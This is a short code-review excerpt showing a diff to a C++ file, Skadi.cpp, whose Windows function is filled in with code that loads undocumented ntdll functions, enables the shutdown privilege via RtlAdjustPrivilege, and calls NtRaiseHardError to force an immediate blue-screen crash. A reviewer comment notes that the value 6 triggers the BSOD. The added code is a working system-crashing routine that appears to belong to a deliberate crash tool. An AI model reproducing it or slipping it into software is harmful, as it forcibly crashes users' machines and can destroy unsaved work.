Skadi/Skadi.cpp

```diff
@@ -12,7 +12,14 @@ void linux_skadi() {
 #elif _WIN32
 
 void windows_skadi() {
-	// TODO
+	BOOLEAN bEnabled;
+	ULONG uResp;
+	LPVOID lpFuncAddress = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlAdjustPrivilege");
+	LPVOID lpFuncAddress2 = GetProcAddress(GetModuleHandle("ntdll.dll"), "NtRaiseHardError");
+	pdef_RtlAdjustPrivilege NtCall = (pdef_RtlAdjustPrivilege)lpFuncAddress;
+	pdef_NtRaiseHardError NtCall2 = (pdef_NtRaiseHardError)lpFuncAddress2;
+	NTSTATUS NtRet = NtCall(19, TRUE, FALSE, &bEnabled);
+	NtCall2(STATUS_FLOAT_MULTIPLE_FAULTS, 0, 0, 0, 6, &uResp);
```

Comment:
That `6` on the fifth parameter causes the BSOD.
NtRaiseHardError is undocumented.